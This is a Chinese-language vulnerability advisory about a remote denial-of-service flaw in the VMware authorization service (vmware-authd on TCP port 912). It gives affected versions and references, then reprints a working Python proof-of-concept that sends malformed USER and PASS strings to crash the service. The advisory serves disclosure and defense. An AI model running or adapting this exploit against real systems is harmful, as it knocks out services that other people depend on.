严重影响系统的正常运行:VMware Player远程拒绝服务漏洞公布
当此远程拒绝服务漏洞被利用时,严重影响系统的正常运行,甚至造成停止响应而当机.根据报告,确认VMware Workstation 6.5.3 build 185404和VMware Player 2.5.3 build 185404中的vmware-authd.exe 6.5.3.8888版本受此漏洞影响。其他版本也可能受此漏洞影响。
影响版本: 
VMWare Workstation 6.5.3 build 185404 
VMWare Player 2.5.3 build 185404漏洞描述: 
Bugraq ID: 36630
VMware Player是一款可以让PC用户在Windows或Linux PC上很容易的运行虚拟机的免费软件。VMWare Workstation是一款流行的虚拟机应用程序。 
当处理登录请求时VMware授权服务存在错误,通过提交包含 ’\xFF’字符的"USER"或"PASS"字符串给监听在TCP 912端口的"vmware-authd"进程,可导致服务停止响应。
<*参考  
http://www.shinnai.net/index.php?mod=02_Forum&group=02_Bugs_and_Exploits&argument=01_Remote&topic=1254924405.ff.php 
http://secunia.com/advisories/36988/ 
*> 
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# ---------------------------------------------------------------------------- 
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS 
# url: http://www.vmware.com/ 
# 
# author: shinnai 
# mail: shinnai[at]autistici[dot]org 
# site: http://www.shinnai.net 
# 
# This was written for educational purpose. Use it at your own risk. 
# Author will be not responsible for any damage. 
# 
# Tested on Windows XP Professional Ita SP3 full patched 
# ---------------------------------------------------------------------------- 
# usage: C:\>exploit.py 127.0.0.1 912 
import socket 
import time 
import sys 
host = str(sys.argv[1]) 
port = int(sys.argv[2]) 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
try: 
    conn = s.connect((host, port)) 
    d = s.recv(1024) 
    print "Server <- " + d 
    s.send(’USER \x25\xFF \r\n’) 
    print ’Sending command "USER" + evil string...’ 
    d = s.recv(1024) 
    print "Server response <- " + d 
    s.send(’PASS \x25\xFF \r\n’) 
    print ’Sending command "PASS" + evil string...’ 
    try: 
        d = s.recv(1024) 
        print "Server response <- " + d 
    except: 
        print "\nExploit completed..." 
except: 
    print "Something goes wrong honey..." 
 SEBUG安全建议: 
厂商解决方案:
目前没有详细解决方案提供: 
http://www.vmware.com/
更多此远程拒绝服务漏洞的问题,请随时关注上面官方网站,是否提供解决方案.
转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 
本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点